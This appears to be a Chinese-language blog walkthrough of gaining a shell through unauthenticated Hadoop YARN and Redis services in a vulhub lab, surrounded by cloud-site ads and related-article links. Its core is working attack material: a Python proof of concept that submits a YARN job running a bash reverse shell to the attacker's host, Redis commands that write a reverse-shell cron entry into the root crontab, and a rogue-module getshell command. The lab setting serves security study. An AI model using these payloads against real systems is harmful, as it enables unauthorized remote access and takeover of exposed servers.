Hadoop未授权GetShell

本文涉及的产品
云数据库 Tair(兼容Redis),内存型 2GB
Redis 开源版,标准版 2GB
推荐场景:
搭建游戏排行榜
简介: Hadoop未授权GetShell

网络架构图讲解:

注:下面均为本地虚拟机ip,仅仅模拟内网环境,漏洞环境vulhub搭建

Hadoop服务器和个人PC同处与局域网,所以他们两个是通的,

个人PC和vps 是NAT模式,也是相通,Hadoop和VPS 网络不通。

Vulhub靶场下载地址

git clone https://github.com/vulhub/vulhub.git

下载docker 和 docker-compose

启动漏洞

docker-compose up -d

#1 第一步嘛 肯定信息收集一波

端口扫描


#2 发现漏洞

http://192.168.1.59:8088/ws/v1/cluster/apps/new-application

640.png

nice,good,666

#3 反弹shell

VMware 有一个端口映射,做一个外道内映射就完美解决问题

当访问宿主机8888端口 转发到VPS 8888端口

nc 开启监听

使用python 去攻击 下面为poc

import requests
target = 'http://192.168.1.59:8088/'
lhost = '192.168.1.42' # 攻击方的IP地址
url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/8888 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

成功反弹shell

640.png

使用goby扫描 发现redis未授权,这个工具非常厉害,无需安装环境,即可进行大部分漏洞复现


   

写反弹shell

set  shell  "\n* * * * * bash -i >& /dev/tcp/192.168.1.42/8888 0>&1\n"
config set dir /var/spool/crontabs/
config set dbfilename root
save

第二种

https://github.com/vulhub/redis-rogue-getshell

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "id"


相关实践学习
基于Redis实现在线游戏积分排行榜
本场景将介绍如何基于Redis数据库实现在线游戏中的游戏玩家积分排行榜功能。
云数据库 Redis 版使用教程
云数据库Redis版是兼容Redis协议标准的、提供持久化的内存数据库服务,基于高可靠双机热备架构及可无缝扩展的集群架构,满足高读写性能场景及容量需弹性变配的业务需求。 产品详情:https://www.aliyun.com/product/kvstore     ------------------------------------------------------------------------- 阿里云数据库体验:数据库上云实战 开发者云会免费提供一台带自建MySQL的源数据库 ECS 实例和一台目标数据库 RDS实例。跟着指引,您可以一步步实现将ECS自建数据库迁移到目标数据库RDS。 点击下方链接,领取免费ECS&RDS资源,30分钟完成数据库上云实战!https://developer.aliyun.com/adc/scenario/51eefbd1894e42f6bb9acacadd3f9121?spm=a2c6h.13788135.J_3257954370.9.4ba85f24utseFl
相关文章
|
4月前
|
分布式计算 Hadoop Linux
Hadoop检查本地文件系统:
【7月更文挑战第24天】
43 6
|
4月前
|
存储 分布式计算 Hadoop
Hadoop中验证备份
【7月更文挑战第25天】
50 5
|
4月前
|
分布式计算 资源调度 Hadoop
Hadoop软件与配置问题
【7月更文挑战第14天】
46 3
|
6月前
|
分布式计算 安全 Hadoop
Hadoop安全模式
【5月更文挑战第12天】
56 2
|
6月前
|
分布式计算 监控 Hadoop
Hadoop权限问题
【5月更文挑战第6天】Hadoop权限问题
91 1
|
SQL 安全 数据可视化
Apache Superset 未授权访问漏洞(CVE-2023-27524)
Apache Superset 存在未授权访问漏洞,攻击者可利用该漏洞验证和访问未经授权的资源。
259 1
|
安全 Java 数据安全/隐私保护
ZooKeeper 未授权访问漏洞利用
ZooKeeper 未授权访问漏洞利用
1766 1
|
分布式计算 Java Hadoop
hadoop实现文件的上传下载
hadoop实现文件的上传下载
|
机器学习/深度学习 SQL 分布式计算
配置 HDFS-创建 Kerberos 对应的账户设置 Keytab 文件|学习笔记
快速学习配置 HDFS-创建 Kerberos 对应的账户设置 Keytab 文件
|
分布式计算 资源调度 安全
Hadoop Yarn RPC未授权访问漏洞
Hadoop Yarn RPC未授权访问漏洞
1659 0
Hadoop Yarn RPC未授权访问漏洞

相关实验场景

更多